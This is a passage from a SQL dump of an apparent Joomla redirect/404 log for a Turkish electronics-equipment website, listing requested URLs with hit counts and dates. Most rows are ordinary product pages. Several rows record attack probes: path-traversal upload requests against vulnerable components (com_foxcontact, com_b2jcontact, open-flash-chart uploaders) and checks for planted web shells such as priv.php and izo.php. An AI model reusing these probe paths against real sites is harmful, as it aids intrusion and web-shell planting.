00:00:00',301),(19984,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/results,1-100',NULL,'','',4,0,'2018-05-23 13:23:23','0000-00-00 00:00:00',301),(19985,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name',NULL,'','',3,0,'2018-05-23 15:38:59','0000-00-00 00:00:00',301),(19986,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/results,1-40',NULL,'','',2,0,'2018-05-23 16:03:09','0000-00-00 00:00:00',301),(19987,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,product_name/results,1-10',NULL,'','',2,0,'2018-05-23 17:59:34','0000-00-00 00:00:00',301),(19988,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,product_sku/results,1-50',NULL,'','',2,0,'2018-05-23 18:33:42','0000-00-00 00:00:00',301),(19989,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',4,0,'2018-05-23 20:48:48','0000-00-00 00:00:00',301),(19990,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/dirdesc',NULL,'','',3,0,'2018-05-23 21:10:37','0000-00-00 00:00:00',301),(19991,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-5',NULL,'','',3,0,'2018-05-23 23:10:36','0000-00-00 00:00:00',301),(19992,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-05-24 00:16:04','0000-00-00 00:00:00',301),(19993,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-10',NULL,'','',1,0,'2018-05-24 02:16:03','0000-00-00 00:00:00',301),(19994,'http://www.3s-technologies.com.tr/tr/priv.php',NULL,'','',3,0,'2018-05-24 02:58:40','0000-00-00 00:00:00',301),(19995,'http://www.3s-technologies.com.tr/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',6,0,'2018-05-24 02:58:41','0000-00-00 00:00:00',301),(19996,'http://www.3s-technologies.com.tr/administrator/components/com_simplephotogallery/lib/uploadfile.php',NULL,'','',4,0,'2018-05-24 02:58:42','0000-00-00 00:00:00',301),(19997,'http://www.3s-technologies.com.tr/tr/priv\'..\'',NULL,'','',1,0,'2018-05-24 02:58:43','0000-00-00 00:00:00',301),(19998,'http://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/priv.php.j',NULL,'','',1,0,'2018-05-24 02:58:46','0000-00-00 00:00:00',301),(19999,'http://www.3s-technologies.com.tr/tr/media/priv.php',NULL,'','',1,0,'2018-05-24 02:58:47','0000-00-00 00:00:00',301),(20000,'http://www.3s-technologies.com.tr/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',1,0,'2018-05-24 02:58:49','0000-00-00 00:00:00',301),(20001,'http://www.3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php/files/priv.php',NULL,'','',1,0,'2018-05-24 02:58:50','0000-00-00 00:00:00',301),(20002,'http://www.3s-technologies.com.tr/modules/mod_socialpinboard_menu/saveimagefromupload.php',NULL,'','',1,0,'2018-05-24 02:58:51','0000-00-00 00:00:00',301),(20003,'http://www.3s-technologies.com.tr/tr/modules/mod_socialpinboard_menu/images/socialpinboard/temp/								<p><a href=\"/index.php',NULL,'','',18,0,'2018-05-24 02:58:52','0000-00-00 00:00:00',301),(20004,'http://www.3s-technologies.com.tr/components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2018-05-24 02:58:53','0000-00-00 00:00:00',301),(20005,'http://www.3s-technologies.com.tr/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2018-05-24 02:58:53','0000-00-00 00:00:00',301),(20006,'http://www.3s-technologies.com.tr/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',NULL,'','',1,0,'2018-05-24 02:58:54','0000-00-00 00:00:00',301),(20007,'http://www.3s-technologies.com.tr/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2018-05-24 02:58:54','0000-00-00 00:00:00',301),(20008,'http://www.3s-technologies.com.tr/tr/components/com_foxcontact/_func.php.php',NULL,'','',1,0,'2018-05-24 02:58:55','0000-00-00 00:00:00',301),(20009,'http://www.3s-technologies.com.tr/tr/kontakty',NULL,'','',29,0,'2018-05-24 02:58:57','0000-00-00 00:00:00',301),(20010,'http://www.3s-technologies.com.tr/tr/kontakty.html',NULL,'','',19,0,'2018-05-24 02:58:58','0000-00-00 00:00:00',301),(20011,'http://www.3s-technologies.com.tr/tr/contatti.html',NULL,'','',27,0,'2018-05-24 02:58:59','0000-00-00 00:00:00',301),(20012,'http://www.3s-technologies.com.tr/tr/index.php/kontakty',NULL,'','',19,0,'2018-05-24 02:59:00','0000-00-00 00:00:00',301),(20013,'http://www.3s-technologies.com.tr/tr/contact',NULL,'','',32,0,'2018-05-24 02:59:01','0000-00-00 00:00:00',301),(20014,'http://www.3s-technologies.com.tr/tr/contacto',NULL,'','',29,0,'2018-05-24 02:59:02','0000-00-00 00:00:00',301),(20015,'http://www.3s-technologies.com.tr/tr/index.php/contato.html',NULL,'','',27,0,'2018-05-24 02:59:03','0000-00-00 00:00:00',301),(20016,'http://www.3s-technologies.com.tr/en/contact',NULL,'','',1,0,'2018-05-24 02:59:03','0000-00-00 00:00:00',301),(20017,'http://www.3s-technologies.com.tr/tr/contactenos',NULL,'','',29,0,'2018-05-24 02:59:04','0000-00-00 00:00:00',301),(20018,'http://www.3s-technologies.com.tr/tr/tmp/plupload/priv.php',NULL,'','',1,0,'2018-05-24 02:59:06','0000-00-00 00:00:00',301),(20019,'http://www.3s-technologies.com.tr/tr/components/com_b2jcontact/izoc.php',NULL,'','',23,0,'2018-05-24 02:59:08','0000-00-00 00:00:00',301),(20020,'http://www.3s-technologies.com.tr/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2018-05-24 02:59:09','0000-00-00 00:00:00',301),(20021,'http://www.3s-technologies.com.tr/tr/com_sexycontactform/fileupload/files/priv.php',NULL,'','',1,0,'2018-05-24 02:59:10','0000-00-00 00:00:00',301),(20022,'http://www.3s-technologies.com.tr/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',1,0,'2018-05-24 02:59:13','0000-00-00 00:00:00',301),(20023,'http://www.3s-technologies.com.tr/tr/images/stories/priv.php.xxxjpg',NULL,'','',2,0,'2018-05-24 02:59:15','0000-00-00 00:00:00',301),(20024,'http://www.3s-technologies.com.tr/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',1,0,'2018-05-24 02:59:17','0000-00-00 00:00:00',301),(20025,'http://www.3s-technologies.com.tr/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',3,0,'2018-05-24 02:59:20','0000-00-00 00:00:00',301),(20026,'http://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/priv.php',NULL,'','',2,0,'2018-05-24 02:59:20','0000-00-00 00:00:00',301),(20027,'http://www.3s-technologies.com.tr/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',2,0,'2018-05-24 02:59:21','0000-00-00 00:00:00',301),(20028,'http://www.3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/priv.php',NULL,'','',1,0,'2018-05-24 02:59:22','0000-00-00 00:00:00',301),(20029,'http://www.3s-technologies.com.tr/index.php?option=com_jwallpapers&task=upload',NULL,'','',1,0,'2018-05-24 02:59:22','0000-00-00 00:00:00',301),(20030,'http://www.3s-technologies.com.tr/tr/jwallpapers_files/plupload/priv.php',NULL,'','',1,0,'2018-05-24 02:59:23','0000-00-00 00:00:00',301),(20031,'http://www.3s-technologies.com.tr/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=izo.php',NULL,'','',1,0,'2018-05-24 02:59:23','0000-00-00 00:00:00',301),(20032,'http://www.3s-technologies.com.tr/tr/administrator/components/com_redmystic/chart/tmp-upload-images/izo.php',NULL,'','',10,0,'2018-05-24 02:59:27','0000-00-00 00:00:00',301),(20033,'http://www.3s-technologies.com.tr/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',1,0,'2018-05-24 02:59:38','0000-00-00 00:00:00',301),(20034,'http://www.3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/priv.php',NULL,'','',1,0,'2018-05-24 02:59:38','0000-00-00 00:00:00',301),(20035,'http://www.3s-technologies.com.tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2018-05-24 02:59:39','0000-00-00 00:00:00',301),(20036,'http://www.3s-technologies.com.tr/tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/tmp-upload-images/xxb.php',NULL,'','',3,0,'2018-05-24 02:59:39','0000-00-00 00:00:00',301),(20037,'http://www.3s-technologies.com.tr/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2018-05-24 02:59:40','0000-00-00 00:00:00',301),(20038,'http://www.3s-technologies.com.tr/tr/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/xxb.php',NULL,'','',3,0,'2018-05-24 02:59:41','0000-00-00 00:00:00',301),(20039,'http://www.3s-technologies.com.tr/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2018-05-24 02:59:41','0000-00-00 00:00:00',301),(20040,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/xxb.php',NULL,'','',3,0,'2018-05-24 02:59:42','0000-00-00 00:00:00',301),(20041,'http://www.3s-technologies.com.tr/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2018-05-24 02:59:42','0000-00-00 00:00:00',301),(20042,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/xxb.php',NULL,'','',3,0,'2018-05-24 02:59:43','0000-00-00 00:00:00',301),(20043,'http://www.3s-technologies.com.tr/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2018-05-24 02:59:43','0000-00-00 00:00:00',301),(20044,'http://www.3s-technologies.com.tr/tr/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/xxb.php',NULL,'','',3,0,'2018-05-24 02:59:44','0000-00-00 00:00:00',301),(20045,'http://www.3s-technologies.com.tr/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2018-05-24 02:59:44','0000-00-00 00:00:00',301),(20046,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/xxb.php',NULL,'','',3,0,'2018-05-24 02:59:45','0000-00-00 00:00:00',301),(20047,'http://www.3s-technologies.com.tr/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2018-05-24 02:59:45','0000-00-00 00:00:00',301),(20048,'http://www.3s-technologies.com.tr/tr/components/com_joomleague/assets/classes/tmp-upload-images/xxb.php',NULL,'','',3,0,'2018-05-24 02:59:46','0000-00-00 00:00:00',301),(20049,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-50',NULL,'','',4,0,'2018-05-24 03:43:19','0000-00-00 00:00:00',301),(20050,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',3,0,'2018-05-24 04:05:08','0000-00-00 00:00:00',301),(20051,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,ordering/results,1-5?language=en-gb',NULL,'','',4,0,'2018-05-24 04:41:34','0000-00-00 00:00:00',301),(20052,'http://3s-technologies.com.tr/tr/jeffs_simple_cms/media_uploader/server/php/',NULL,'http://3s-technologies.com.tr/tr/jeffs_simple_cms/media_uploader/server/php/','',1,0,'2018-05-24 05:11:35','0000-00-00 00:00:00',301),(20053,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-20',NULL,'','',3,0,'2018-05-24 05:43:19','0000-00-00 00:00:00',301),(20054,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,mf_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-05-24 06:48:47','0000-00-00 00:00:00',301),(20055,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-5',NULL,'','',4,0,'2018-05-24 07:43:19','0000-00-00 00:00:00',301),(20056,'http://3s-technologies.com.tr/en/wp-content/plugins/fluid_forms/file-upload/server/php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/fluid_forms/file-upload/server/php/','',3,0,'2018-05-24 09:15:30','0000-00-00 00:00:00',301),(20057,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',4,0,'2018-05-24 13:54:12','0000-00-00 00:00:00',301),(20058,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,pc.ordering,product_name/results,6-15',NULL,'','',6,0,'2018-05-24 14:48:45','0000-00-00 00:00:00',301),(20059,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,product_sku/results,1-50',NULL,'','',1,0,'2018-05-24 16:24:11','0000-00-00 00:00:00',301),(20060,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,ordering/results,1-50',NULL,'','',1,0,'2018-05-24 16:39:11','0000-00-00 00:00:00',301),(20061,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/results,1-20',NULL,'','',2,0,'2018-05-24 17:16:00','0000-00-00 00:00:00',301),(20062,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,ordering/results,1-20?language=en-gb',NULL,'','',9,0,'2018-05-24 18:25:14','0000-00-00 00:00:00',301),(20063,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,ordering/results,1-10?language=en-gb',NULL,'','',4,0,'2018-05-24 19:40:14','0000-00-00 00:00:00',301),(20064,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri',NULL,'','',10,0,'2018-05-24 22:59:38','0000-00-00 00:00:00',301),(20065,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,product_sku/results,1-10',NULL,'','',4,0,'2018-05-25 01:44:05','0000-00-00 00:00:00',301),(20066,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_sku/results,1-5?language=en-gb',NULL,'','',4,0,'2018-05-25 03:09:45','0000-00-00 00:00:00',301),(20067,'http://3s-technologies.com.tr/tr/images/fancybox/fancy_shadow_n.png',NULL,'','',3,0,'2018-05-25 16:07:50','0000-00-00 00:00:00',301),(20068,'http://3s-technologies.com.tr/tr/images/fancybox/fancy_shadow_ne.png',NULL,'','',3,0,'2018-05-25 16:07:50','0000-00-00 00:00:00',301),(20069,'http://3s-technologies.com.tr/tr/images/fancybox/fancy_shadow_e.png',NULL,'','',3,0,'2018-05-25 16:07:51','0000-00-00 00:00:00',301),(20070,'http://3s-technologies.com.tr/tr/images/fancybox/fancy_shadow_se.png',NULL,'','',3,0,'2018-05-25 16:07:51','0000-00-00 00:00:00',301),(20071,'http://3s-technologies.com.tr/tr/images/fancybox/fancy_shadow_s.png',NULL,'','',3,0,'2018-05-25 16:07:51','0000-00-00 00:00:00',301),(20072,'http://3s-technologies.com.tr/tr/images/fancybox/fancy_shadow_sw.png',NULL,'','',3,0,'2018-05-25 16:07:52','0000-00-00 00:00:00',301),(20073,'http://3s-technologies.com.tr/tr/images/fancybox/fancy_shadow_w.png',NULL,'','',3,0,'2018-05-25 16:07:52','0000-00-00 00:00:00',301),(20074,'http://3s-technologies.com.tr/tr/images/fancybox/fancy_shadow_nw.png',NULL,'','',3,0,'2018-05-25 16:07:52','0000-00-00 00:00:00',301),(20075,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,product_sku/results,1-50',NULL,'','',2,0,'2018-05-25 17:37:22','0000-00-00 00:00:00',301),(20076,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_sku/results,1-10?language=en-gb',NULL,'','',3,0,'2018-05-25 17:39:17','0000-00-00 00:00:00',301),(20077,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-5?language=en-gb',NULL,'','',1,0,'2018-05-25 20:24:18','0000-00-00 00:00:00',301),(20078,'http://3s-technologies.com.tr/tr/media/rxr__bgsdy.php',NULL,'','',1,0,'2018-05-25 21:06:21','0000-00-00 00:00:00',301),(20079,'http://3s-technologies.com.tr/tr/rxr__bgsdy.php',NULL,'','',1,0,'2018-05-25 21:06:29','0000-00-00 00:00:00',301),(20080,'http://3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php/files/rxr__bgsdy.php',NULL,'','',1,0,'2018-05-25 21:06:33','0000-00-00 00:00:00',301),(20081,'http://3s-technologies.com.tr/tr/modules/mod_socialpinboard_menu/images/socialpinboard/temp/rxr__bgsdy.php',NULL,'','',1,0,'2018-05-25 21:06:40','0000-00-00 00:00:00',301),(20082,'http://3s-technologies.com.tr/tr/com_sexycontactform/fileupload/files/rxr__bgsdy.php',NULL,'','',1,0,'2018-05-25 21:06:58','0000-00-00 00:00:00',301),(20083,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/rxr__bgsdy.php',NULL,'','',1,0,'2018-05-25 21:07:28','0000-00-00 00:00:00',301),(20084,'http://3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/rxr__bgsdy.php',NULL,'','',1,0,'2018-05-25 21:07:36','0000-00-00 00:00:00',301),(20085,'http://3s-technologies.com.tr/tr/jwallpapers_files/plupload/rxr__bgsdy.php',NULL,'','',1,0,'2018-05-25 21:07:48','0000-00-00 00:00:00',301),(20086,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/rxr__bgsdy.php',NULL,'','',1,0,'2018-05-25 21:08:04','0000-00-00 00:00:00',301),(20087,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/results,1-5?language=en-gb',NULL,'','',3,0,'2018-05-25 22:54:17','0000-00-00 00:00:00',301),(20088,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-10?language=en-gb',NULL,'','',3,0,'2018-05-26 01:24:17','0000-00-00 00:00:00',301),(20089,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-50?language=en-gb',NULL,'','',4,0,'2018-05-26 03:09:16','0000-00-00 00:00:00',301),(20090,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/results,1-10?language=en-gb',NULL,'','',1,0,'2018-05-26 06:37:32','0000-00-00 00:00:00',301),(20091,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-5?language=en-gb',NULL,'','',1,0,'2018-05-26 06:42:37','0000-00-00 00:00:00',301),(20092,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-5?language=en-gb',NULL,'','',2,0,'2018-05-26 08:44:19','0000-00-00 00:00:00',301),(20093,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2018-05-26 08:54:40','0000-00-00 00:00:00',301),(20094,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-20?language=en-gb',NULL,'','',4,0,'2018-05-26 11:33:12','0000-00-00 00:00:00',301),(20095,'http://3s-technologies.com.tr/tr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../me.php',NULL,'','',1,0,'2018-05-26 12:33:35','0000-00-00 00:00:00',301),(20096,'http://3s-technologies.com.tr/tr/components/me.php',NULL,'','',1,0,'2018-05-26 12:33:43','0000-00-00 00:00:00',301),(20097,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-20?language=en-gb',NULL,'','',4,0,'2018-05-26 14:18:11','0000-00-00 00:00:00',301),(20098,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-50?language=en-gb',NULL,'','',4,0,'2018-05-26 18:06:26','0000-00-00 00:00:00',301),(20099,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,product_sku/results,1-40',NULL,'','',1,0,'2018-05-27 13:11:36','0000-00-00 00:00:00',301),(20100,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-50',NULL,'','',6,0,'2018-05-28 01:16:10','0000-00-00 00:00:00',301),(20101,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-20',NULL,'','',5,0,'2018-05-28 02:46:10','0000-00-00 00:00:00',301),(20102,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-10',NULL,'','',1,0,'2018-05-28 04:01:09','0000-00-00 00:00:00',301),(20103,'http://3s-technologies.com.tr/tr/phpmyadmin/',NULL,'','',6,0,'2018-05-28 04:35:31','0000-00-00 00:00:00',301),(20104,'http://3s-technologies.com.tr/tr/pma/',NULL,'','',3,0,'2018-05-28 04:35:35','0000-00-00 00:00:00',301),(20105,'http://3s-technologies.com.tr/tr/myadmin/',NULL,'','',3,0,'2018-05-28 04:35:35','0000-00-00 00:00:00',301),(20106,'http://3s-technologies.com.tr/tr/sql/',NULL,'','',3,0,'2018-05-28 04:35:36','0000-00-00 00:00:00',301),(20107,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc',NULL,'','',6,0,'2018-05-28 07:01:11','0000-00-00 00:00:00',301),(20108,'http://3s-technologies.com.tr/en/members/page2.html',NULL,'http://3s-technologies.com.tr','',1,0,'2018-05-28 07:38:43','0000-00-00 00:00:00',301),(20109,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/dirdesc',NULL,'','',4,0,'2018-05-28 08:33:12','0000-00-00 00:00:00',301),(20110,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-5',NULL,'','',1,0,'2018-05-28 12:01:08','0000-00-00 00:00:00',301),(20111,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-20',NULL,'','',5,0,'2018-05-28 16:01:08','0000-00-00 00:00:00',301),(20112,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,ordering/results,1-10',NULL,'','',2,0,'2018-05-28 16:13:33','0000-00-00 00:00:00',301),(20113,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/results,1-20',NULL,'','',5,0,'2018-05-28 16:14:03','0000-00-00 00:00:00',301),(20114,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-50',NULL,'','',3,0,'2018-05-28 19:16:07','0000-00-00 00:00:00',301),(20115,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-10',NULL,'','',3,0,'2018-05-28 22:16:06','0000-00-00 00:00:00',301),(20116,'http://3s-technologies.com.tr/en/products/2.-el-makineler/results,1-10',NULL,'','',7,0,'2018-05-28 23:38:51','0000-00-00 00:00:00',301),(20117,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/dirdesc/results,1-5',NULL,'','',6,0,'2018-05-29 00:31:06','0000-00-00 00:00:00',301),(20118,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-05-29 01:31:07','0000-00-00 00:00:00',301),(20119,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/dirdesc/results,1-50',NULL,'','',3,0,'2018-05-29 04:34:44','0000-00-00 00:00:00',301),(20120,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-05-29 07:58:43','0000-00-00 00:00:00',301),(20121,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc/results,1-5',NULL,'','',4,0,'2018-05-29 09:58:42','0000-00-00 00:00:00',301),(20122,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc/results,1-50',NULL,'','',5,0,'2018-05-29 11:13:25','0000-00-00 00:00:00',301),(20123,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc/results,1-20',NULL,'','',3,0,'2018-05-29 11:52:12','0000-00-00 00:00:00',301),(20124,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2018-05-29 13:23:30','0000-00-00 00:00:00',301),(20125,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-20?language=en-gb',NULL,'','',7,0,'2018-05-29 14:04:21','0000-00-00 00:00:00',301),(20126,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-50?language=en-gb',NULL,'','',5,0,'2018-05-29 15:56:20','0000-00-00 00:00:00',301),(20127,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-20?language=en-gb',NULL,'','',1,0,'2018-05-29 16:21:19','0000-00-00 00:00:00',301),(20128,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,ordering/results,1-100',NULL,'','',2,0,'2018-05-29 17:41:57','0000-00-00 00:00:00',301),(20129,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-20?language=en-gb',NULL,'','',3,0,'2018-05-29 17:58:10','0000-00-00 00:00:00',301),(20130,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,ordering/results,1-5',NULL,'','',1,0,'2018-05-30 04:49:06','0000-00-00 00:00:00',301),(20131,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-05-30 06:51:36','0000-00-00 00:00:00',301),(20132,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/mirae',NULL,'','',19,0,'2018-05-30 08:48:46','0000-00-00 00:00:00',301),(20133,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,category_name/results,1-5?language=en-gb',NULL,'','',5,0,'2018-05-30 11:46:25','0000-00-00 00:00:00',301),(20134,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-50',NULL,'','',1,0,'2018-05-30 14:40:31','0000-00-00 00:00:00',301),(20135,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/screen-printer/by,product_sku/results,1-20',NULL,'','',1,0,'2018-05-30 16:00:05','0000-00-00 00:00:00',301),(20136,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_name/results,1-5',NULL,'','',1,0,'2018-05-30 17:46:43','0000-00-00 